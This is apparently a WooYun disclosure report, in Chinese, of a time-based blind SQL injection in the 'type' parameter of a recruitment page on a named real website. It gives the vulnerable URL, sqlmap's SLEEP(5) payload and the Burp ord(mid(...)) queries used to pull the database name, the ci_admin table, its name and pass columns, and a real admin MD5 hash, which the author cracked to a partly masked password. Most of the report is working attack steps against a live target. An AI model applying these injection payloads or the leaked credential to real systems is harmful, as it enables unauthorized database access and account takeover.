WooYun.org

漏洞链接：http://www.1218.com.cn/index.php/company/recruitment?location=%E6%B7%B1%E5%9C%B3&position=%E7%A0%94%E5%8F%91&type=44
time-based blind sql injection （这个是sqlmap跑出来的，不过我测试的结果应该只是盲注）
可能存在其他注入点不是盲注的，没去找，主要是漏洞存在，及时修复。
基本信息
Place: GET
Parameter: type
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: location=135791&position=135791&type=44 AND SLEEP(5)
---
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
基于时间的盲注比较难跑，而且时不时会出错：
数据库信息 （这个是sqlmap跑出来的）

显然这里面的yzxwz数据库肯定是跑错了，简单推测应该是rzxwz，如下：

这就很明显了，应该不是time-based啊，那用burp配合使用速度还是可以的，因为可以用工具，就不用>>>>>>的判断了
判断语句：
ord(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27rzxwz%27%20limit%201,1),1,1))=§1§：

显然第一个表（貌似是第二个）的第一个字符的ascii码就是99，-----'c' 99，105，95，97，100，109，105，110------'ci_admin'
列判断语句：
ord(mid((select column_name from information_schema.columns where table_name='ci_admin' limit 0,1),1,1))>1
ord(mid((select column_name from information_schema.columns where table_name='ci_admin' and (select column_name from information_schema.columns where table_name='ci_admin' limit 0,n)limit 0,1),1,1))>1
测试加猜（猜是一个很快的办法）：

有name和pass两个字段。
第一个name字段长度为5，再猜一个：

pass32位的，应该是md5加密。

看到吐血啊 -_-
对应过来就是：43f68fea5c30a71bf7570313bb5d6bb1，扔cmd5上：123*******
没有管理员登录页面是什么鬼。。。。。。。。。。。。
就到这了，找到后台在说吧。